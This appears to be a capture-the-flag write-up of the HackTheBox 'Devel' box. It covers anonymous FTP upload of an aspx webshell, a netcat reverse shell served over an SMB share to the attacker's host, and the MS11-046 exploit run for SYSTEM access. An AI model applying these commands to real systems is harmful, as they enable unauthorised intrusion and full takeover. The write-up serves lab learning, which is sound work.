Devel
An easy Windows box from HackTheBox, using an unsecured FTP server and file upload to get initial access, then a version CVE for SYSTEM.
Devel
Recon
Regular nmap
nmap -sC -sV -oA nmap/devel 10.10.10.5
Nmap scan report for 10.10.10.5
Host is up (0.016s latency).
Not shown: 998 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-syst:
|_ SYST: Windows_NT
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 03-18-17 02:06AM <DIR> aspnet_client
| 03-17-17 05:37PM 689 iisstart.htm
|_03-17-17 05:37PM 184946 welcome.png
80/tcp open http Microsoft IIS httpd 7.5
|_http-title: IIS7
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Try to anonymously log in to FTP, and find a few files
ftp> ls
229 Entering Extended Passive Mode (|||49158|)
125 Data connection already open; Transfer starting.
03-18-17 02:06AM <DIR> aspnet_client
03-17-17 05:37PM 689 iisstart.htm
03-17-17 05:37PM 184946 welcome.png
And find that we can also upload files and they show up on the server
touch test.html && echo test > test.html
When you navigate to the server find that it has the FTP directory as the webroot
Exploitation
Know that the server is using IIS7.5 which is aspx based, so can use a webshell to start, then move to a reverse shell
Find the aspx reverse shell
locate cmd.aspx
/usr/share/davtest/backdoors/aspx_cmd.aspx
Then copy it into current directory, and upload to the FTP server to get a webshell
Now need to get nc.exe onto the server, using an smb share, a very cool trick
First, make a smb directory where the root of the share will be
mkdir smb
Then copy nc.exe into smb
cp {path to nc.exe} smb
And run smbshare.py
python3 /home/kali/.local/bin/smbserver.py share smb
The “share” part is just the name of the share, so when you go back to the web shell you can execute nc.exe for a reverse shell like so
\\10.10.14.8\share\nc.exe -e cmd.exe 10.10.14.8 8000
And get shell
Now can run systeminfo and copy it into a text file to run wondows exploit suggester
Host Name: DEVEL
OS Name: Microsoft Windows 7 Enterprise
OS Version: 6.1.7600 N/A Build 7600
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Workstation
OS Build Type: Multiprocessor Free
Registered Owner: babis
Registered Organization:
Product ID: 55041-051-0948536-86302
Original Install Date: 17/3/2017, 4:17:31 ��
System Boot Time: 25/5/2022, 11:30:06 ��
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System Type: X86-based PC
Processor(s): 1 Processor(s) Installed.
[01]: x64 Family 23 Model 49 Stepping 0 AuthenticAMD ~2994 Mhz
BIOS Version: Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume1
System Locale: el;Greek
Input Locale: en-us;English (United States)
Time Zone: (UTC+02:00) Athens, Bucharest, Istanbul
Total Physical Memory: 3.071 MB
Available Physical Memory: 2.472 MB
Virtual Memory: Max Size: 6.141 MB
Virtual Memory: Available: 5.548 MB
Virtual Memory: In Use: 593 MB
Page File Location(s): C:\pagefile.sys
Domain: HTB
Logon Server: N/A
Hotfix(s): N/A
Network Card(s): 1 NIC(s) Installed.
[01]: vmxnet3 Ethernet Adapter
Connection Name: Local Area Connection 3
DHCP Enabled: No
IP address(es)
[01]: 10.10.10.5
[02]: fe80::58c0:f1cf:abc6:bb9e
[03]: dead:beef::4428:f438:fd2a:79a1
[04]: dead:beef::58c0:f1cf:abc6:bb9e
Running windows exploit suggester, see that it is vulnerable to MS11-046, importantly - a reverse shell friendly exploit
Copy it to the smb server and execute it, getting system
c:\Users>\\10.10.14.8\share\MS11-046.exe
\\10.10.14.8\share\MS11-046.exe
c:\Windows\System32>whoami
whoami
nt authority\system